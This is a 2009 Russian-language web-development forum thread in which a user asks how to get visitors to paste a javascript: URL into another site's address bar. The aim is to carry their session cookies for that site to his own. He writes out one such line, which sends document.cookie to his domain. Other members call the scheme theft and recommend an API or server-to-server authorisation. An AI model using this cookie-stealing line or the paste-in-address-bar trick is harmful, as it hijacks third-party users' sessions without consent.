Модераторы: Sardar, Aliance
  

Поиск:

Ответ в темуСоздание новой темы Создание опроса
> Копирование текста в адресную строку браузера 
:(
    Опции темы
Zmiuko
  Дата 24.9.2009, 03:05 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


http://zmiuko.ru
**


Профиль
Группа: Участник
Сообщений: 297
Регистрация: 8.10.2008

Репутация: нет
Всего: 2



Извиняюсь за столь поздний час, за беспокойство.

У меня проблема.

Необходимо при помощи скрипта проделать следущее:


1. Скопировать данные в буфер обмена.
2. Открыть указанную интернет-страницу по указанному адресу, например в другой вкладке.
3. И в адресную строку открытой страницы внести из буфера, допустим javascript:текст

В результате получаем открытую страницу в новой вкладке где в адресной строке пользователю вставлен код. Ему остается только подтвердить, либо не подтвердить.


Я очень хорошо понимаю что это фишинг-подобное, но в гугле таких вопросов не нашел, необходимо не для взлома. Просто для облегчения работы с сервисом.

Прошу помочь. Пожалуйста.

Заранее благодарен.
PM MAIL WWW ICQ Skype Jabber   Вверх
bars80080
Дата 24.9.2009, 10:06 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


прапор творюет
****
Награды: 1



Профиль
Группа: Завсегдатай
Сообщений: 12022
Регистрация: 5.12.2007
Где: Königsberg

Репутация: 15
Всего: 315



для взлома - не для взлома, сам механизм на редкость тонкий. обломаться может в каждом колене


посоветовал бы всё же найти другой концепт для легальной операции
PM MAIL WWW   Вверх
Zmiuko
Дата 24.9.2009, 13:54 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


http://zmiuko.ru
**


Профиль
Группа: Участник
Сообщений: 297
Регистрация: 8.10.2008

Репутация: нет
Всего: 2



Не имею возможности, поскольку использовать буду для авторизации. Сессия пользователя привязана к нескольким уникальным параметрам. Поэтому выход единственный: упростить для него задачу входа с одного ресурса на другой. Другими словами мне необходимо авторизоваться под его куками, дабы подключить функции.

Была идея использовать фрейм на ресурс и посредством обращения к фрейму "граббить" данные cookies, но видители это невозможно :(
PM MAIL WWW ICQ Skype Jabber   Вверх
bars80080
Дата 24.9.2009, 14:40 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


прапор творюет
****
Награды: 1



Профиль
Группа: Завсегдатай
Сообщений: 12022
Регистрация: 5.12.2007
Где: Königsberg

Репутация: 15
Всего: 315



одна база пользователей на несколько разнодоменных сайтов? и надо при переходе, чтобы один раз авторизовавшись, больше не надо было?

и вы решили положиться на столь не надёжную вещь как javascript? да ещё в таком механизме как буфер и вставка чего-то в адресную строку. первое у меня на автомате режется, второе я сам буду сперепугу рубить. когда у меня сайт начинает куда-то упрыгивать, я его вырубаю


Цитата(Zmiuko @  24.9.2009,  13:54 Найти цитируемый пост)
Не имею возможности, поскольку использовать буду для авторизации

не правда. возможности всегда есть.

к примеру, почему бы не делать следующее, все ссылки ведущие с сайта А на сайт Б не сопровождать идентификатором?
а затем на сайте Б создавать запрос из uid, ip, time и обращаться к сайту А, у которого в БД записано, что да, был такой крендель с таким uid, ip и это такой-то пользователь
PM MAIL WWW   Вверх
Zmiuko
  Дата 24.9.2009, 17:17 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


http://zmiuko.ru
**


Профиль
Группа: Участник
Сообщений: 297
Регистрация: 8.10.2008

Репутация: нет
Всего: 2



Постойте-постойте. Никто не говорил, что второй ресурс мой. К примеру есть некий ресурс VASYA.COM на котором авторизация происходит через куки, где хранится просто сессия с привязкой к ip. Есть также мой сайт VOVA.RU , который в силу определенных причин просто жить не может без VASYA.COM поскольку имеет статус вспомогательного сайта, так скажем ряд функционала, подменяющий, либо увеличивающий возможности первого. Следовательно для того чтобы VOVA.RU заработал как надо, необходимо подключиться через сокеты к VASYA.COM. Но тут задаемся проблемой. VAVA.RU же несет в себе вспомогательные функции к VASYA.COM относительно каждого... КАЖДОГО... зарегистрировавшегося там пользователя. Тут же задаемся проблемой: а как же нам авторизовать каждого пользователя, если граббить для них редактируемый контент не имеет смысл - стоит жесткое ограничение. Тут возникает идея, а почему же не попробовать через клиентскую часть... Идем на Винград, задаем вопрос относительно используемых функций javascript либо каких-либо технологий.

Понимаете в чем смысл? Вы уж извините, просто уже весь "лоб расшиб", а проект сдавать к концу недели.

Ту как бы не могу понять каким же методом обойти данное припятствие. Проблема есть, и ее надо решить. Быть может решение данной задачи поможет многим другим в будущем. Что-же касается взломов, то их и без этого топика совершат.
PM MAIL WWW ICQ Skype Jabber   Вверх
bars80080
Дата 24.9.2009, 17:45 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


прапор творюет
****
Награды: 1



Профиль
Группа: Завсегдатай
Сообщений: 12022
Регистрация: 5.12.2007
Где: Königsberg

Репутация: 15
Всего: 315



Цитата(Zmiuko @  24.9.2009,  17:17 Найти цитируемый пост)
если граббить для них редактируемый контент не имеет смысл - стоит жесткое ограничение. Тут возникает идея, а почему же не попробовать через клиентскую часть... 

вот этой фразы не понял


PM MAIL WWW   Вверх
mxt
Дата 24.9.2009, 23:35 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 133
Регистрация: 6.9.2007

Репутация: нет
Всего: 1



если VOVA.com вспомогательный сайт VASJA.com то последний должен знать об этом,  и предоставлять API для этого.


а так тут леваком пахнет так, что глаза режет
--------------------
PM MAIL   Вверх
Zmiuko
Дата 25.9.2009, 02:40 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


http://zmiuko.ru
**


Профиль
Группа: Участник
Сообщений: 297
Регистрация: 8.10.2008

Репутация: нет
Всего: 2



Цитата(bars80080 @ 24.9.2009,  17:45)
Цитата(Zmiuko @  24.9.2009,  17:17 Найти цитируемый пост)
если граббить для них редактируемый контент не имеет смысл - стоит жесткое ограничение. Тут возникает идея, а почему же не попробовать через клиентскую часть... 

вот этой фразы не понял


Если с помощью сокетов ничего не сделаешь. Не пройдешь авторизацию.
PM MAIL WWW ICQ Skype Jabber   Вверх
mxt
Дата 25.9.2009, 13:58 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 133
Регистрация: 6.9.2007

Репутация: нет
Всего: 1



Цитата(Zmiuko @  25.9.2009,  02:40 Найти цитируемый пост)
Если с помощью сокетов ничего не сделаешь. Не пройдешь авторизацию. 

1, при входе пользователя,  посылать на базовый сервер запрос, в котором будет текущий UID ссесии пользователя. и его имя
2. при дальнейших запросах присылать этот UID, чтоб по нему базовый сервер отдавал то что нужно;



но так как базовый VASJA.COM даже и не знает о существовании VOVA.COM и не ту доступа туда,  то  не думаю, что хозяева VASJA.COM хотелиб давать свой функционал постороннему сайту.
--------------------
PM MAIL   Вверх
Zmiuko
  Дата 26.9.2009, 04:42 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


http://zmiuko.ru
**


Профиль
Группа: Участник
Сообщений: 297
Регистрация: 8.10.2008

Репутация: нет
Всего: 2



Эхх.. Да как-то хотели-не хотели ... это второе... Поскольку к примеру при граббинге того же Вконтакте, Яндекс, Гугла... никто не спрашивает - просто делают все через сокеты.. 

Вчера к примеру на Вконтакте обнаружилась ограничение подключения через сокеты. Делаешь сервис к нему, многопоточный. Что бы к примеру организовать отправку граффити либо еще чего. А тоже самое. Теперь посредством отправки кук ничего не получишь. 

Тенденция какая-то убирать из кук все кроме сессий и делать привязку к ip.

На форумах обнаружил, что подменить строку браузера почтищто нереально. Это необходимо делать легально. Вот и хочу легатьно, копировать в кеш ссылку. Открывать стороннее окно и уже в адресной строке того окна/вкладки помещать из буфера обмена примерно следущее: javascript:open('Vova.ru/index.php?c='+document.cookie,'_self'); далее пользователю останется только выбрать нажать или нет.

И пять таже привязка все портит. Скрипт берет куки, формирует запрос, а ip уже не тот. Я уже голову сломал на этом. Не могу додуматься как можно пользователя авторизовать. И фрейм пробовал - но это уже дикие дебри.

Это сообщение отредактировал(а) Zmiuko - 26.9.2009, 04:42
PM MAIL WWW ICQ Skype Jabber   Вверх
bars80080
Дата 26.9.2009, 10:24 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


прапор творюет
****
Награды: 1



Профиль
Группа: Завсегдатай
Сообщений: 12022
Регистрация: 5.12.2007
Где: Königsberg

Репутация: 15
Всего: 315



послушайте, при всём уважении, если авторизация проходит на одном ресурсе, а пользоваться ей мы хотим на другом, то всё равно потребуется внедрить скрипты как во второй ресурс, так и в первый. когда же пытаетесь воспользоваться первым без его уведомления, то как ни крутись - это воровство и нарушение правил, и конечно же оно будет максимально затруднено

принцип общения двух серверов сам по себе не сложный, но для этого нужно чтобы они оба говорили, а не один из них молчал
PM MAIL WWW   Вверх
  
Ответ в темуСоздание новой темы Создание опроса
Форум для вопросов, которые имеются в справочниках, но их поиск вызвал затруднения, или для разработчика требуется совет или просьба отыскать ошибку. Напоминаем: 1) чётко формулируйте вопрос, 2) приведите пример того, что уже сделано, 3) укажите явно, нужен работающий пример или подсказка о том, где найти информацию.
 
0 Пользователей читают эту тему (0 Гостей и 0 Скрытых Пользователей)
0 Пользователей:
« Предыдущая тема | JavaScript: Общие вопросы | Следующая тема »


 




[ Время генерации скрипта: 0.0514 ]   [ Использовано запросов: 22 ]   [ GZIP включён ]


Реклама на сайте     Информационное спонсорство

 
По вопросам размещения рекламы пишите на vladimir(sobaka)vingrad.ru
Отказ от ответственности     Powered by Invision Power Board(R) 1.3 © 2003  IPS, Inc.